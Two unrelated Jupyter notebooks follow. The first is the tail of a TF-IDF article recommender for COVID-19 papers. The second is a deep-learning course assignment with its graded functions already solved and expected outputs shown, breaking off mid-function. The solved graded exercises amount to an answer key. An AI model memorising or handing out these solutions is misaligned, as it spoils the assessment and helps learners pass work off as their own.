### 3. Retrieve full article text Now that we have the metadata for the public domain articles as its own dataframe, let's retrieve the full text for each public domain scientific article. ``` # Extract text from all public domain articles (may take 2-3 min) all_text = covid_utils.get_public_domain_text(df=metadata_public, container_name=container_name, azure_storage_sas_token=sas_token) ``` Notice that **all_text** is the same as **metadata_public** but now has an additional column called **full_text** which contains the full text for each respective article. ``` # Preview all_text.head() ``` ### 4. Instantiate the recommender All functions for data preparation and recommendation are contained within the **TfidfRecommender** class we have imported. Prior to running these functions, we must create an object of this class. Select one of the following tokenization methods to use in the model: | tokenization_method | Description | |:--------------------|:---------------------------------------------------------------------------------------------------------------------------------| | 'none' | No tokenization is applied. Each word is considered a token. | | 'nltk' | Simple stemming is applied using NLTK. | | 'bert' | HuggingFace BERT word tokenization ('bert-base-cased') is applied. | | 'scibert' | SciBERT word tokenization ('allenai/scibert_scivocab_cased') is applied.<br>This is recommended for scientific journal articles. | ``` # Create the recommender object recommender = TfidfRecommender(id_col='cord_uid', tokenization_method='scibert') ``` ### 5. Prepare text for use in the TF-IDF recommender The raw text retrieved for each article requires basic cleaning prior to being used in the TF-IDF model. Let's look at the full_text from the first article in our dataframe as an example. ``` # Preview the first 1000 characters of the full scientific text from one example print(all_text['full_text'][0][:1000]) ``` As seen above, there are some special characters (such as • ▲ ■ ≥ °) and punctuation which should be removed prior to using the text as input. Casing (capitalization) is preserved for [BERT-based tokenization methods](https://huggingface.co/transformers/model_doc/bert.html), but is removed for simple or no tokenization. Let's join together the **title**, **abstract**, and **full_text** columns and clean them for future use in the TF-IDF model. ``` # Assign columns to clean and combine cols_to_clean = ['title','abstract','full_text'] clean_col = 'cleaned_text' df_clean = recommender.clean_dataframe(all_text, cols_to_clean, clean_col) # Preview the dataframe with the cleaned text df_clean.head() # Preview the first 1000 characters of the cleaned version of the previous example print(df_clean[clean_col][0][:1000]) ``` Let's also tokenize the cleaned text for use in the TF-IDF model. The tokens are stored within our TfidfRecommender object. ``` # Tokenize text with tokenization_method specified in class instantiation tf, vectors_tokenized = recommender.tokenize_text(df_clean, text_col=clean_col) ``` ### 6. Recommend articles using TF-IDF Let's now fit the recommender model to the processed data (tokens) and retrieve the top k recommended articles. When creating our object, we specified k=5 so the `recommend_top_k_items` function will return the top 5 recommendations for each public domain article. ``` # Fit the TF-IDF vectorizer recommender.fit(tf, vectors_tokenized) # Get recommendations top_k_recommendations = recommender.recommend_top_k_items(df_clean, k=5) ``` In our recommendation table, each row represents a single recommendation. - **cord_uid** corresponds to the article that is being used to make recommendations from. - **rec_rank** contains the recommdation's rank (e.g., rank of 1 means top recommendation). - **rec_score** is the cosine similarity score between the query article and the recommended article. - **rec_cord_uid** corresponds to the recommended article. ``` # Preview the recommendations top_k_recommendations ``` Optionally, we can access the full recommendation dictionary, which contains full ranked lists for each public domain article. ``` # Optionally view full recommendation list full_rec_list = recommender.recommendations article_of_interest = 'ej795nks' print('Number of recommended articles for ' + article_of_interest + ': ' + str(len(full_rec_list[article_of_interest]))) ``` Optionally, we can also view the tokens and stop words which were used in the recommender. ``` # Optionally view tokens tokens = recommender.get_tokens() # Preview 10 tokens print(list(tokens.keys())[:10]) # Preview just the first 10 stop words sorted alphabetically stop_words = list(recommender.get_stop_words()) stop_words.sort() print(stop_words[:10]) ``` ### 7. Display top recommendations for article of interest Now that we have the recommendation table containing IDs for both query and recommended articles, we can easily return the full metadata for the top k recommendations for any given article. ``` cols_to_keep = ['title','authors','journal','publish_time','url'] recommender.get_top_k_recommendations(metadata_public,article_of_interest,cols_to_keep) ``` ### Conclusion In this notebook, we have demonstrated how to create a TF-IDF recommender to recommend the top k (in this case 5) articles similar in content to an article of interest (in this example, article with `cord_uid='ej795nks'`).
github_jupyter
# Building your Deep Neural Network: Step by Step Welcome to your week 4 assignment (part 1 of 2)! You have previously trained a 2-layer Neural Network (with a single hidden layer). This week, you will build a deep neural network, with as many layers as you want! - In this notebook, you will implement all the functions required to build a deep neural network. - In the next assignment, you will use these functions to build a deep neural network for image classification. **After this assignment you will be able to:** - Use non-linear units like ReLU to improve your model - Build a deeper neural network (with more than 1 hidden layer) - Implement an easy-to-use neural network class **Notation**: - Superscript $[l]$ denotes a quantity associated with the $l^{th}$ layer. - Example: $a^{[L]}$ is the $L^{th}$ layer activation. $W^{[L]}$ and $b^{[L]}$ are the $L^{th}$ layer parameters. - Superscript $(i)$ denotes a quantity associated with the $i^{th}$ example. - Example: $x^{(i)}$ is the $i^{th}$ training example. - Lowerscript $i$ denotes the $i^{th}$ entry of a vector. - Example: $a^{[l]}_i$ denotes the $i^{th}$ entry of the $l^{th}$ layer's activations). Let's get started! ## 1 - Packages Let's first import all the packages that you will need during this assignment. - [numpy](www.numpy.org) is the main package for scientific computing with Python. - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python. - dnn_utils provides some necessary functions for this notebook. - testCases provides some test cases to assess the correctness of your functions - np.random.seed(1) is used to keep all the random function calls consistent. It will help us grade your work. Please don't change the seed. ``` import numpy as np import h5py import matplotlib.pyplot as plt from testCases_v3 import * from dnn_utils_v2 import sigmoid, sigmoid_backward, relu, relu_backward %matplotlib inline plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots plt.rcParams['image.interpolation'] = 'nearest' plt.rcParams['image.cmap'] = 'gray' %load_ext autoreload %autoreload 2 np.random.seed(1) ``` ## 2 - Outline of the Assignment To build your neural network, you will be implementing several "helper functions". These helper functions will be used in the next assignment to build a two-layer neural network and an L-layer neural network. Each small helper function you will implement will have detailed instructions that will walk you through the necessary steps. Here is an outline of this assignment, you will: - Initialize the parameters for a two-layer network and for an $L$-layer neural network. - Implement the forward propagation module (shown in purple in the figure below). - Complete the LINEAR part of a layer's forward propagation step (resulting in $Z^{[l]}$). - We give you the ACTIVATION function (relu/sigmoid). - Combine the previous two steps into a new [LINEAR->ACTIVATION] forward function. - Stack the [LINEAR->RELU] forward function L-1 time (for layers 1 through L-1) and add a [LINEAR->SIGMOID] at the end (for the final layer $L$). This gives you a new L_model_forward function. - Compute the loss. - Implement the backward propagation module (denoted in red in the figure below). - Complete the LINEAR part of a layer's backward propagation step. - We give you the gradient of the ACTIVATE function (relu_backward/sigmoid_backward) - Combine the previous two steps into a new [LINEAR->ACTIVATION] backward function. - Stack [LINEAR->RELU] backward L-1 times and add [LINEAR->SIGMOID] backward in a new L_model_backward function - Finally update the parameters. <img src="images/final outline.png" style="width:800px;height:500px;"> <caption><center> **Figure 1**</center></caption><br> **Note** that for every forward function, there is a corresponding backward function. That is why at every step of your forward module you will be storing some values in a cache. The cached values are useful for computing gradients. In the backpropagation module you will then use the cache to calculate the gradients. This assignment will show you exactly how to carry out each of these steps. ## 3 - Initialization You will write two helper functions that will initialize the parameters for your model. The first function will be used to initialize parameters for a two layer model. The second one will generalize this initialization process to $L$ layers. ### 3.1 - 2-layer Neural Network **Exercise**: Create and initialize the parameters of the 2-layer neural network. **Instructions**: - The model's structure is: *LINEAR -> RELU -> LINEAR -> SIGMOID*. - Use random initialization for the weight matrices. Use `np.random.randn(shape)*0.01` with the correct shape. - Use zero initialization for the biases. Use `np.zeros(shape)`. ``` # GRADED FUNCTION: initialize_parameters def initialize_parameters(n_x, n_h, n_y): """ Argument: n_x -- size of the input layer n_h -- size of the hidden layer n_y -- size of the output layer Returns: parameters -- python dictionary containing your parameters: W1 -- weight matrix of shape (n_h, n_x) b1 -- bias vector of shape (n_h, 1) W2 -- weight matrix of shape (n_y, n_h) b2 -- bias vector of shape (n_y, 1) """ np.random.seed(1) ### START CODE HERE ### (≈ 4 lines of code) W1 = np.random.randn(n_h, n_x) * 0.01 b1 = np.zeros(shape=(n_h, 1)) W2 = np.random.randn(n_y, n_h) * 0.01 b2 = np.zeros(shape=(n_y, 1)) ### END CODE HERE ### assert(W1.shape == (n_h, n_x)) assert(b1.shape == (n_h, 1)) assert(W2.shape == (n_y, n_h)) assert(b2.shape == (n_y, 1)) parameters = {"W1": W1, "b1": b1, "W2": W2, "b2": b2} return parameters parameters = initialize_parameters(3,2,1) print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ``` **Expected output**: <table style="width:80%"> <tr> <td> **W1** </td> <td> [[ 0.01624345 -0.00611756 -0.00528172] [-0.01072969 0.00865408 -0.02301539]] </td> </tr> <tr> <td> **b1**</td> <td>[[ 0.] [ 0.]]</td> </tr> <tr> <td>**W2**</td> <td> [[ 0.01744812 -0.00761207]]</td> </tr> <tr> <td> **b2** </td> <td> [[ 0.]] </td> </tr> </table> ### 3.2 - L-layer Neural Network The initialization for a deeper L-layer neural network is more complicated because there are many more weight matrices and bias vectors. When completing the `initialize_parameters_deep`, you should make sure that your dimensions match between each layer. Recall that $n^{[l]}$ is the number of units in layer $l$. Thus for example if the size of our input $X$ is $(12288, 209)$ (with $m=209$ examples) then: <table style="width:100%"> <tr> <td> </td> <td> **Shape of W** </td> <td> **Shape of b** </td> <td> **Activation** </td> <td> **Shape of Activation** </td> <tr> <tr> <td> **Layer 1** </td> <td> $(n^{[1]},12288)$ </td> <td> $(n^{[1]},1)$ </td> <td> $Z^{[1]} = W^{[1]} X + b^{[1]} $ </td> <td> $(n^{[1]},209)$ </td> <tr> <tr> <td> **Layer 2** </td> <td> $(n^{[2]}, n^{[1]})$ </td> <td> $(n^{[2]},1)$ </td> <td>$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$ </td> <td> $(n^{[2]}, 209)$ </td> <tr> <tr> <td> $\vdots$ </td> <td> $\vdots$ </td> <td> $\vdots$ </td> <td> $\vdots$</td> <td> $\vdots$ </td> <tr> <tr> <td> **Layer L-1** </td> <td> $(n^{[L-1]}, n^{[L-2]})$ </td> <td> $(n^{[L-1]}, 1)$ </td> <td>$Z^{[L-1]} = W^{[L-1]} A^{[L-2]} + b^{[L-1]}$ </td> <td> $(n^{[L-1]}, 209)$ </td> <tr> <tr> <td> **Layer L** </td> <td> $(n^{[L]}, n^{[L-1]})$ </td> <td> $(n^{[L]}, 1)$ </td> <td> $Z^{[L]} = W^{[L]} A^{[L-1]} + b^{[L]}$</td> <td> $(n^{[L]}, 209)$ </td> <tr> </table> Remember that when we compute $W X + b$ in python, it carries out broadcasting. For example, if: $$ W = \begin{bmatrix} j & k & l\\ m & n & o \\ p & q & r \end{bmatrix}\;\;\; X = \begin{bmatrix} a & b & c\\ d & e & f \\ g & h & i \end{bmatrix} \;\;\; b =\begin{bmatrix} s \\ t \\ u \end{bmatrix}\tag{2}$$ Then $WX + b$ will be: $$ WX + b = \begin{bmatrix} (ja + kd + lg) + s & (jb + ke + lh) + s & (jc + kf + li)+ s\\ (ma + nd + og) + t & (mb + ne + oh) + t & (mc + nf + oi) + t\\ (pa + qd + rg) + u & (pb + qe + rh) + u & (pc + qf + ri)+ u \end{bmatrix}\tag{3} $$ **Exercise**: Implement initialization for an L-layer Neural Network. **Instructions**: - The model's structure is *[LINEAR -> RELU] $ \times$ (L-1) -> LINEAR -> SIGMOID*. I.e., it has $L-1$ layers using a ReLU activation function followed by an output layer with a sigmoid activation function. - Use random initialization for the weight matrices. Use `np.random.rand(shape) * 0.01`. - Use zeros initialization for the biases. Use `np.zeros(shape)`. - We will store $n^{[l]}$, the number of units in different layers, in a variable `layer_dims`. For example, the `layer_dims` for the "Planar Data classification model" from last week would have been [2,4,1]: There were two inputs, one hidden layer with 4 hidden units, and an output layer with 1 output unit. Thus means `W1`'s shape was (4,2), `b1` was (4,1), `W2` was (1,4) and `b2` was (1,1). Now you will generalize this to $L$ layers! - Here is the implementation for $L=1$ (one layer neural network). It should inspire you to implement the general case (L-layer neural network). ```python if L == 1: parameters["W" + str(L)] = np.random.randn(layer_dims[1], layer_dims[0]) * 0.01 parameters["b" + str(L)] = np.zeros((layer_dims[1], 1)) ``` ``` # GRADED FUNCTION: initialize_parameters_deep def initialize_parameters_deep(layer_dims): """ Arguments: layer_dims -- python array (list) containing the dimensions of each layer in our network Returns: parameters -- python dictionary containing your parameters "W1", "b1", ..., "WL", "bL": Wl -- weight matrix of shape (layer_dims[l], layer_dims[l-1]) bl -- bias vector of shape (layer_dims[l], 1) """ np.random.seed(3) parameters = {} L = len(layer_dims) # number of layers in the network for l in range(1, L): ### START CODE HERE ### (≈ 2 lines of code) parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * 0.01 parameters['b' + str(l)] = np.zeros((layer_dims[l], 1)) ### END CODE HERE ### assert(parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1])) assert(parameters['b' + str(l)].shape == (layer_dims[l], 1)) return parameters parameters = initialize_parameters_deep([5,4,3]) print("W1 = " + str(parameters["W1"])) print("b1 = " + str(parameters["b1"])) print("W2 = " + str(parameters["W2"])) print("b2 = " + str(parameters["b2"])) ``` **Expected output**: <table style="width:80%"> <tr> <td> **W1** </td> <td>[[ 0.01788628 0.0043651 0.00096497 -0.01863493 -0.00277388] [-0.00354759 -0.00082741 -0.00627001 -0.00043818 -0.00477218] [-0.01313865 0.00884622 0.00881318 0.01709573 0.00050034] [-0.00404677 -0.0054536 -0.01546477 0.00982367 -0.01101068]]</td> </tr> <tr> <td>**b1** </td> <td>[[ 0.] [ 0.] [ 0.] [ 0.]]</td> </tr> <tr> <td>**W2** </td> <td>[[-0.01185047 -0.0020565 0.01486148 0.00236716] [-0.01023785 -0.00712993 0.00625245 -0.00160513] [-0.00768836 -0.00230031 0.00745056 0.01976111]]</td> </tr> <tr> <td>**b2** </td> <td>[[ 0.] [ 0.] [ 0.]]</td> </tr> </table> ## 4 - Forward propagation module ### 4.1 - Linear Forward Now that you have initialized your parameters, you will do the forward propagation module. You will start by implementing some basic functions that you will use later when implementing the model. You will complete three functions in this order: - LINEAR - LINEAR -> ACTIVATION where ACTIVATION will be either ReLU or Sigmoid. - [LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID (whole model) The linear forward module (vectorized over all the examples) computes the following equations: $$Z^{[l]} = W^{[l]}A^{[l-1]} +b^{[l]}\tag{4}$$ where $A^{[0]} = X$. **Exercise**: Build the linear part of forward propagation. **Reminder**: The mathematical representation of this unit is $Z^{[l]} = W^{[l]}A^{[l-1]} +b^{[l]}$. You may also find `np.dot()` useful. If your dimensions don't match, printing `W.shape` may help. ``` # GRADED FUNCTION: linear_forward def linear_forward(A, W, b): """ Implement the linear part of a layer's forward propagation. Arguments: A -- activations from previous layer (or input data): (size of previous layer, number of examples) W -- weights matrix: numpy array of shape (size of current layer, size of previous layer) b -- bias vector, numpy array of shape (size of the current layer, 1) Returns: Z -- the input of the activation function, also called pre-activation parameter cache -- a python dictionary containing "A", "W" and "b" ; stored for computing the backward pass efficiently """ ### START CODE HERE ### (≈ 1 line of code) Z = np.dot(W, A) + b ### END CODE HERE ### assert(Z.shape == (W.shape[0], A.shape[1])) cache = (A, W, b) return Z, cache A, W, b = linear_forward_test_case() Z, linear_cache = linear_forward(A, W, b) print("Z = " + str(Z)) ``` **Expected output**: <table style="width:35%"> <tr> <td> **Z** </td> <td> [[ 3.26295337 -1.23429987]] </td> </tr> </table> ### 4.2 - Linear-Activation Forward In this notebook, you will use two activation functions: - **Sigmoid**: $\sigma(Z) = \sigma(W A + b) = \frac{1}{ 1 + e^{-(W A + b)}}$. We have provided you with the `sigmoid` function. This function returns **two** items: the activation value "`a`" and a "`cache`" that contains "`Z`" (it's what we will feed in to the corresponding backward function). To use it you could just call: ``` python A, activation_cache = sigmoid(Z) ``` - **ReLU**: The mathematical formula for ReLu is $A = RELU(Z) = max(0, Z)$. We have provided you with the `relu` function. This function returns **two** items: the activation value "`A`" and a "`cache`" that contains "`Z`" (it's what we will feed in to the corresponding backward function). To use it you could just call: ``` python A, activation_cache = relu(Z) ``` For more convenience, you are going to group two functions (Linear and Activation) into one function (LINEAR->ACTIVATION). Hence, you will implement a function that does the LINEAR forward step followed by an ACTIVATION forward step. **Exercise**: Implement the forward propagation of the *LINEAR->ACTIVATION* layer. Mathematical relation is: $A^{[l]} = g(Z^{[l]}) = g(W^{[l]}A^{[l-1]} +b^{[l]})$ where the activation "g" can be sigmoid() or relu(). Use linear_forward() and the correct activation function. ``` # GRADED FUNCTION: linear_activation_forward def linear_activation_forward(A_prev, W, b, activation): """ Implement the forward propagation for the LINEAR->ACTIVATION layer Arguments: A_prev -- activations from previous layer (or input data): (size of previous layer, number of examples) W -- weights matrix: numpy array of shape (size of current layer, size of previous layer) b -- bias vector, numpy array of shape (size of the current layer, 1) activation -- the activation to be used in this layer, stored as a text string: "sigmoid" or "relu" Returns: A -- the output of the activation function, also called the post-activation value cache -- a python dictionary containing "linear_cache" and "activation_cache"; stored for computing the backward pass efficiently """ if activation == "sigmoid": # Inputs: "A_prev, W, b". Outputs: "A, activation_cache". ### START CODE HERE ### (≈ 2 lines of code) Z, linear_cache = linear_forward(A_prev, W, b) A, activation_cache = sigmoid(Z) ### END CODE HERE ### elif activation == "relu": # Inputs: "A_prev, W, b". Outputs: "A, activation_cache". ### START CODE HERE ### (≈ 2 lines of code) Z, linear_cache = linear_forward(A_prev, W, b) A, activation_cache = relu(Z) ### END CODE HERE ### assert (A.shape == (W.shape[0], A_prev.shape[1])) cache = (linear_cache, activation_cache) return A, cache A_prev, W, b = linear_activation_forward_test_case() A, linear_activation_cache = linear_activation_forward(A_prev, W, b, activation = "sigmoid") print("With sigmoid: A = " + str(A)) A, linear_activation_cache = linear_activation_forward(A_prev, W, b, activation = "relu") print("With ReLU: A = " + str(A)) ``` **Expected output**: <table style="width:35%"> <tr> <td> **With sigmoid: A ** </td> <td > [[ 0.96890023 0.11013289]]</td> </tr> <tr> <td> **With ReLU: A ** </td> <td > [[ 3.43896131 0. ]]</td> </tr> </table> **Note**: In deep learning, the "[LINEAR->ACTIVATION]" computation is counted as a single layer in the neural network, not two layers. ### d) L-Layer Model For even more convenience when implementing the $L$-layer Neural Net, you will need a function that replicates the previous one (`linear_activation_forward` with RELU) $L-1$ times, then follows that with one `linear_activation_forward` with SIGMOID. <img src="images/model_architecture_kiank.png" style="width:600px;height:300px;"> <caption><center> **Figure 2** : *[LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID* model</center></caption><br> **Exercise**: Implement the forward propagation of the above model. **Instruction**: In the code below, the variable `AL` will denote $A^{[L]} = \sigma(Z^{[L]}) = \sigma(W^{[L]} A^{[L-1]} + b^{[L]})$. (This is sometimes also called `Yhat`, i.e., this is $\hat{Y}$.) **Tips**: - Use the functions you had previously written - Use a for loop to replicate [LINEAR->RELU] (L-1) times - Don't forget to keep track of the caches in the "caches" list. To add a new value `c` to a `list`, you can use `list.append(c)`. ``` # GRADED FUNCTION: L_model_forward def L_model_forward(X, parameters): """ Implement forward propagation for the [LINEAR->RELU]*(L-1)->LINEAR->SIGMOID computation Arguments: X -- data, numpy array of shape (input size, number of examples) parameters -- output of initialize_parameters_deep() Returns: AL -- last post-activation value caches -- list of caches containing: every cache of linear_relu_forward() (there are L-1 of them, indexed from 0 to L-2) the cache of linear_sigmoid_forward() (there is one, indexed L-1) """ caches = [] A = X L = len(parameters) // 2 # number of layers in the neural network # Implement [LINEAR -> RELU]*(L-1). Add "cache" to the "caches" list. for l in range(1, L): A_prev = A ### START CODE HERE ### (≈ 2 lines of code) A, cache = linear_activation_forward(A_prev, parameters['W{}'.format(l)], parameters['b{}'.format(l)], 'relu') caches.append(cache) ### END CODE HERE ### # Implement LINEAR -> SIGMOID. Add "cache" to the "caches" list. ### START CODE HERE ### (≈ 2 lines of code) AL, cache = linear_activation_forward(A, parameters['W{}'.format(L)], parameters['b{}'.format(L)], 'sigmoid') caches.append(cache) ### END CODE HERE ### assert(AL.shape == (1,X.shape[1])) return AL, caches X, parameters = L_model_forward_test_case_2hidden() AL, caches = L_model_forward(X, parameters) print("AL = " + str(AL)) print("Length of caches list = " + str(len(caches))) ``` <table style="width:50%"> <tr> <td> **AL** </td> <td > [[ 0.03921668 0.70498921 0.19734387 0.04728177]]</td> </tr> <tr> <td> **Length of caches list ** </td> <td > 3 </td> </tr> </table> Great! Now you have a full forward propagation that takes the input X and outputs a row vector $A^{[L]}$ containing your predictions. It also records all intermediate values in "caches". Using $A^{[L]}$, you can compute the cost of your predictions. ## 5 - Cost function Now you will implement forward and backward propagation. You need to compute the cost, because you want to check if your model is actually learning. **Exercise**: Compute the cross-entropy cost $J$, using the following formula: $$-\frac{1}{m} \sum\limits_{i = 1}^{m} (y^{(i)}\log\left(a^{[L] (i)}\right) + (1-y^{(i)})\log\left(1- a^{[L](i)}\right)) \tag{7}$$ ``` # GRADED FUNCTION: compute_cost def compute_cost(AL, Y): """ Implement the cost function defined by equation (7). Arguments: AL -- probability vector corresponding to your label predictions, shape (1, number of examples) Y -- true "label" vector (for example: containing 0 if non-cat, 1 if cat), shape (1, number of examples) Returns: cost -- cross-entropy cost """ m = Y.shape[1] # Compute loss from aL and y. ### START CODE HERE ### (≈ 1 lines of code) cost = (-1 / m) * np.sum(np.multiply(Y, np.log(AL)) + np.multiply(1 - Y, np.log(1 - AL))) ### END CODE HERE ### cost = np.squeeze(cost) # To make sure your cost's shape is what we expect (e.g. this turns [[17]] into 17). assert(cost.shape == ()) return cost Y, AL = compute_cost_test_case() print("cost = " + str(compute_cost(AL, Y))) ``` **Expected Output**: <table> <tr> <td>**cost** </td> <td> 0.41493159961539694</td> </tr> </table> ## 6 - Backward propagation module Just like with forward propagation, you will implement helper functions for backpropagation. Remember that back propagation is used to calculate the gradient of the loss function with respect to the parameters. **Reminder**: <img src="images/backprop_kiank.png" style="width:650px;height:250px;"> <caption><center> **Figure 3** : Forward and Backward propagation for *LINEAR->RELU->LINEAR->SIGMOID* <br> *The purple blocks represent the forward propagation, and the red blocks represent the backward propagation.* </center></caption> <!-- For those of you who are expert in calculus (you don't need to be to do this assignment), the chain rule of calculus can be used to derive the derivative of the loss $\mathcal{L}$ with respect to $z^{[1]}$ in a 2-layer network as follows: $$\frac{d \mathcal{L}(a^{[2]},y)}{{dz^{[1]}}} = \frac{d\mathcal{L}(a^{[2]},y)}{{da^{[2]}}}\frac{{da^{[2]}}}{{dz^{[2]}}}\frac{{dz^{[2]}}}{{da^{[1]}}}\frac{{da^{[1]}}}{{dz^{[1]}}} \tag{8} $$ In order to calculate the gradient $dW^{[1]} = \frac{\partial L}{\partial W^{[1]}}$, you use the previous chain rule and you do $dW^{[1]} = dz^{[1]} \times \frac{\partial z^{[1]} }{\partial W^{[1]}}$. During the backpropagation, at each step you multiply your current gradient by the gradient corresponding to the specific layer to get the gradient you wanted. Equivalently, in order to calculate the gradient $db^{[1]} = \frac{\partial L}{\partial b^{[1]}}$, you use the previous chain rule and you do $db^{[1]} = dz^{[1]} \times \frac{\partial z^{[1]} }{\partial b^{[1]}}$. This is why we talk about **backpropagation**. !--> Now, similar to forward propagation, you are going to build the backward propagation in three steps: - LINEAR backward - LINEAR -> ACTIVATION backward where ACTIVATION computes the derivative of either the ReLU or sigmoid activation - [LINEAR -> RELU] $\times$ (L-1) -> LINEAR -> SIGMOID backward (whole model) ### 6.1 - Linear backward For layer $l$, the linear part is: $Z^{[l]} = W^{[l]} A^{[l-1]} + b^{[l]}$ (followed by an activation). Suppose you have already calculated the derivative $dZ^{[l]} = \frac{\partial \mathcal{L} }{\partial Z^{[l]}}$. You want to get $(dW^{[l]}, db^{[l]} dA^{[l-1]})$. <img src="images/linearback_kiank.png" style="width:250px;height:300px;"> <caption><center> **Figure 4** </center></caption> The three outputs $(dW^{[l]}, db^{[l]}, dA^{[l]})$ are computed using the input $dZ^{[l]}$.Here are the formulas you need: $$ dW^{[l]} = \frac{\partial \mathcal{L} }{\partial W^{[l]}} = \frac{1}{m} dZ^{[l]} A^{[l-1] T} \tag{8}$$ $$ db^{[l]} = \frac{\partial \mathcal{L} }{\partial b^{[l]}} = \frac{1}{m} \sum_{i = 1}^{m} dZ^{[l](i)}\tag{9}$$ $$ dA^{[l-1]} = \frac{\partial \mathcal{L} }{\partial A^{[l-1]}} = W^{[l] T} dZ^{[l]} \tag{10}$$ **Exercise**: Use the 3 formulas above to implement linear_backward(). ``` # GRADED FUNCTION: linear_backward def linear_backward(dZ, cache): """ Implement the linear portion of backward propagation for a single layer (layer l) Arguments: dZ -- Gradient of the cost with respect to the linear output (of current layer l) cache -- tuple of values (A_prev, W, b) coming from the forward propagation in the current layer Returns: dA_prev -- Gradient of the cost with respect to the activation (of the previous layer l-1), same shape as A_prev dW -- Gradient of the cost with respect to W (current layer l), same shape as W db -- Gradient of the cost with respect to b (current layer l), same shape as b """ A_prev, W, b = cache m = A_prev.shape[1] ### START CODE HERE ### (≈ 3 lines of code) dW = 1 / m * np.dot(dZ, A_prev.T) db = 1 / m * np.sum(dZ, axis=1, keepdims=True) dA_prev = np.dot(W.T, dZ) ### END CODE HERE ### assert (dA_prev.shape == A_prev.shape) assert (dW.shape == W.shape) assert (db.shape == b.shape) return dA_prev, dW, db # Set up some test inputs dZ, linear_cache = linear_backward_test_case() dA_prev, dW, db = linear_backward(dZ, linear_cache) print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db)) ``` **Expected Output**: <table style="width:90%"> <tr> <td> **dA_prev** </td> <td > [[ 0.51822968 -0.19517421] [-0.40506361 0.15255393] [ 2.37496825 -0.89445391]] </td> </tr> <tr> <td> **dW** </td> <td > [[-0.10076895 1.40685096 1.64992505]] </td> </tr> <tr> <td> **db** </td> <td> [[ 0.50629448]] </td> </tr> </table> ### 6.2 - Linear-Activation backward Next, you will create a function that merges the two helper functions: **`linear_backward`** and the backward step for the activation **`linear_activation_backward`**. To help you implement `linear_activation_backward`, we provided two backward functions: - **`sigmoid_backward`**: Implements the backward propagation for SIGMOID unit. You can call it as follows: ```python dZ = sigmoid_backward(dA, activation_cache) ``` - **`relu_backward`**: Implements the backward propagation for RELU unit. You can call it as follows: ```python dZ = relu_backward(dA, activation_cache) ``` If $g(.)$ is the activation function, `sigmoid_backward` and `relu_backward` compute $$dZ^{[l]} = dA^{[l]} * g'(Z^{[l]}) \tag{11}$$. **Exercise**: Implement the backpropagation for the *LINEAR->ACTIVATION* layer. ``` # GRADED FUNCTION: linear_activation_backward def linear_activation_backward(dA, cache, activation): """ Implement the backward propagation for the LINEAR->ACTIVATION layer. Arguments: dA -- post-activation gradient for current layer l cache -- tuple of values (linear_cache, activation_cache) we store for computing backward propagation efficiently activation -- the activation to be used in this layer, stored as a text string: "sigmoid" or "relu" Returns: dA_prev -- Gradient of the cost with respect to the activation (of the previous layer l-1), same shape as A_prev dW -- Gradient of the cost with respect to W (current layer l), same shape as W db -- Gradient of the cost with respect to b (current layer l), same shape as b """ linear_cache, activation_cache = cache if activation == "relu": ### START CODE HERE ### (≈ 2 lines of code) dZ = relu_backward(dA, activation_cache) ### END CODE HERE ### elif activation == "sigmoid": ### START CODE HERE ### (≈ 2 lines of code) dZ = sigmoid_backward(dA, activation_cache) ### END CODE HERE ### # Shorten the code dA_prev, dW, db = linear_backward(dZ, linear_cache) return dA_prev, dW, db AL, linear_activation_cache = linear_activation_backward_test_case() dA_prev, dW, db = linear_activation_backward(AL, linear_activation_cache, activation = "sigmoid") print ("sigmoid:") print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db) + "\n") dA_prev, dW, db = linear_activation_backward(AL, linear_activation_cache, activation = "relu") print ("relu:") print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db)) ``` **Expected output with sigmoid:** <table style="width:100%"> <tr> <td > dA_prev </td> <td >[[ 0.11017994 0.01105339] [ 0.09466817 0.00949723] [-0.05743092 -0.00576154]] </td> </tr> <tr> <td > dW </td> <td > [[ 0.10266786 0.09778551 -0.01968084]] </td> </tr> <tr> <td > db </td> <td > [[-0.05729622]] </td> </tr> </table> **Expected output with relu:** <table style="width:100%"> <tr> <td > dA_prev </td> <td > [[ 0.44090989 0. ] [ 0.37883606 0. ] [-0.2298228 0. ]] </td> </tr> <tr> <td > dW </td> <td > [[ 0.44513824 0.37371418 -0.10478989]] </td> </tr> <tr> <td > db </td> <td > [[-0.20837892]] </td> </tr> </table> ### 6.3 - L-Model Backward Now you will implement the backward function for the whole network. Recall that when you implemented the `L_model_forward` function, at each iteration, you stored a cache which contains (X,W,b, and z). In the back propagation module, you will use those variables to compute the gradients. Therefore, in the `L_model_backward` function, you will iterate through all the hidden layers backward, starting from layer $L$. On each step, you will use the cached values for layer $l$ to backpropagate through layer $l$. Figure 5 below shows the backward pass. <img src="images/mn_backward.png" style="width:450px;height:300px;"> <caption><center> **Figure 5** : Backward pass </center></caption> ** Initializing backpropagation**: To backpropagate through this network, we know that the output is, $A^{[L]} = \sigma(Z^{[L]})$. Your code thus needs to compute `dAL` $= \frac{\partial \mathcal{L}}{\partial A^{[L]}}$. To do so, use this formula (derived using calculus which you don't need in-depth knowledge of): ```python dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL)) # derivative of cost with respect to AL ``` You can then use this post-activation gradient `dAL` to keep going backward. As seen in Figure 5, you can now feed in `dAL` into the LINEAR->SIGMOID backward function you implemented (which will use the cached values stored by the L_model_forward function). After that, you will have to use a `for` loop to iterate through all the other layers using the LINEAR->RELU backward function. You should store each dA, dW, and db in the grads dictionary. To do so, use this formula : $$grads["dW" + str(l)] = dW^{[l]}\tag{15} $$ For example, for $l=3$ this would store $dW^{[l]}$ in `grads["dW3"]`. **Exercise**: Implement backpropagation for the *[LINEAR->RELU] $\times$ (L-1) -> LINEAR -> SIGMOID* model. ``` # GRADED FUNCTION: L_model_backward def L_model_backward(AL, Y, caches): """ Implement the backward propagation for the [LINEAR->RELU] * 